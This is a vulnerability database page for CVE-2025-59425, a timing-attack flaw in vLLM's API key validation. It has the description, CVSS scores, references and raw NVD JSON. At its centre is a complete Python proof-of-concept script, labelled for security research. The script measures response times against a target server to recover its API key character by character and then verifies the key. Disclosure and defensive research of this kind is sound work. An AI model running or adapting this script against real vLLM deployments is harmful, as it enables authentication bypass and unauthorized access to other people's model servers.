CVE-2025-59425

Description

vLLM is an inference and serving engine for large language models (LLMs). Before version 0.11.0rc2, the API key support in vLLM performs validation using a method that was vulnerable to a timing attack. API key validation uses a string comparison that takes longer the more characters the provided API key gets correct. Data analysis across many attempts could allow an attacker to determine when it finds the next correct character in the key sequence. Deployments relying on vLLM's built-in API key validation are vulnerable to authentication bypass using this technique. Version 0.11.0rc2 fixes the issue.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:vllm:vllm:0.11.0:rc1:*:*:*:*:*:* - VULNERABLE

vLLM < 0.11.0rc2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-59425 PoC - vLLM API Key Timing Attack
# This PoC demonstrates how to exploit the timing attack vulnerability
# in vLLM's API key validation to bypass authentication.

import requests
import time
import statistics
from concurrent.futures import ThreadPoolExecutor

TARGET_URL = "http://target-vllm-server:8000/v1/models"
API_KEY_LENGTH = 32  # Adjust based on target's key length
CHARSET = "abcdef0123456789"
SAMPLES_PER_CHAR = 50

def measure_response_time(headers):
    """Measure HTTP response time for a given set of headers."""
    times = []
    for _ in range(SAMPLES_PER_CHAR):
        start = time.perf_counter_ns()
        try:
            response = requests.get(TARGET_URL, headers=headers, timeout=5)
        except requests.exceptions.RequestException:
            continue
        end = time.perf_counter_ns()
        times.append(end - start)
    return statistics.median(times) if times else float('inf')

def test_key_prefix(prefix, char):
    """Test if appending a character to the prefix yields a longer response time."""
    test_key = prefix + char + "a" * (API_KEY_LENGTH - len(prefix) - 1)
    headers = {"Authorization": f"Bearer {test_key}"}
    return char, measure_response_time(headers)

def timing_attack():
    """Perform timing attack to recover the API key character by character."""
    discovered_key = ""
    
    for position in range(API_KEY_LENGTH):
        print(f"[*] Discovering character at position {position}...")
        
        with ThreadPoolExecutor(max_workers=len(CHARSET)) as executor:
            futures = [
                executor.submit(test_key_prefix, discovered_key, char)
                for char in CHARSET
            ]
            results = [f.result() for f in futures]
        
        # The character with the longest response time is likely correct
        results.sort(key=lambda x: x[1], reverse=True)
        best_char, best_time = results[0]
        second_best_time = results[1][1]
        
        # Verify with a threshold (timing difference should be noticeable)
        if best_time - second_best_time > 1000:  # nanoseconds threshold
            discovered_key += best_char
            print(f"[+] Found character: {best_char} (key so far: {discovered_key})")
        else:
            print(f"[-] Could not determine character at position {position}")
            break
    
    return discovered_key

if __name__ == "__main__":
    print(f"[*] Starting timing attack against {TARGET_URL}")
    api_key = timing_attack()
    print(f"\n[+] Recovered API key: {api_key}")
    
    # Verify the recovered key
    headers = {"Authorization": f"Bearer {api_key}"}
    response = requests.get(TARGET_URL, headers=headers)
    print(f"[*] Verification status code: {response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59425
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59425
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59425/
[4] VulDB https://vuldb.com/cve/CVE-2025-59425
[5] https://github.com/vllm-project/vllm/blob/4b946d693e0af15740e9ca9c0e059d5f333b1083/vllm/entrypoints/openai/api_server.py#L1270-L1274
[6] https://github.com/vllm-project/vllm/commit/ee10d7e6ff5875386c7f136ce8b5f525c8fcef48
[7] https://github.com/vllm-project/vllm/releases/tag/v0.11.0
[8] https://github.com/vllm-project/vllm/security/advisories/GHSA-wr9h-g72x-mwhm

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59425", "sourceIdentifier": "[email protected]", "published": "2025-10-07T14:15:38.950", "lastModified": "2025-10-16T18:02:09.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). Before version 0.11.0rc2, the API key support in vLLM performs validation using a method that was vulnerable to a timing attack. API key validation uses a string comparison that takes longer the more characters the provided API key gets correct. Data analysis across many attempts could allow an attacker to determine when it finds the next correct character in the key sequence. Deployments relying on vLLM's built-in API key validation are vulnerable to authentication bypass using this technique. Version 0.11.0rc2 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-385"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.11.0", "matchCriteriaId": "99A24E23-769D-4DB8-BF37-EEC71EE83630"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:0.11.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "46639D64-5C28-44F3-AE25-9212114AFC8E"}]}]}], "references": [{"url": "https://github.com/vllm-project/vllm/blob/4b946d693e0af15740e9ca9c0e059d5f333b1083/vllm/entrypoints/openai/api_server.py#L1270-L1274", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/vllm-project/vllm/commit/ee10d7e6ff5875386c7f136ce8b5f525c8fcef48", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vllm-project/vllm/releases/tag/v0.11.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-wr9h-g72x-mwhm", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}